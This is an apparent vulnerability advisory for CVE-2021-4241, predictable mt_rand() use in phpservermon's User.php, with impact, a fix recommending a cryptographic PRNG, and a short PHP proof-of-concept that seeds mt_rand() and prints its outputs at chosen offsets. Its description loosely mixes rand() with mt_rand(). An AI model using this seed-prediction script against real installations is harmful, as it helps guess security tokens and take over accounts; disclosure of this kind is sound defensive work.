CVE-2021-4241: Use of Predictable Algorithm in Random Number Generator in phpservermon

✍️ Description

Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in security-sensitive context. This code uses the rand() function to generate “unique” identifiers for the receipt pages it generates. In this case the function that generates weak random numbers is mt_rand() in User.php at line 324.

🕵️‍♂️ Proof of Concept

**poc.php**

#!/usr/bin/env php
<?php

if($argc < 3)
{
    print($argv[0] . ' <seed> <n>' . "\n");
    print('' . "\n");
    print('Parameters:' . "\n");
    print('  seed:   Seed to initialize mt_rand() with' . "\n");
    print('  offset: Number of calls to mt_rand() before printing the first');
    print(' output' . "\n");
    print('' . "\n");
    print('Output:' . "\n");
    print('  <offset>\'s call to mt_rand() and <offset+227>\'s call');
    print(' to mt_rand()' . "\n");
    exit();
}

mt_srand($argv[1]);
for($i=0;$i<$argv[2];$i++)
    mt_rand();

print mt_rand() . " ";
for($i=0;$i<226;$i++)
    mt_rand();
print mt_rand() . "\n";

💥 Impact

The random number generator implemented by mt_rand() cannot withstand a cryptographic attack. Because rand() is a statistical PRNG, it is easy for an attacker to guess the strings it generates.

🕵️‍♂️ Solution

When unpredictability is critical, as is the case with most security-sensitive uses of randomness, use a cryptographic PRNG. Regardless of the PRNG you choose, always use a value with sufficient entropy to seed the algorithm. (Values such as the current time offer only negligible entropy and should not be used.)

Occurrences

References

• BREAKING PHP’S MT_RAND() WITH 2 VALUES AND NO BRUTEFORCE
• CWE-330: Use of Insufficiently Random Values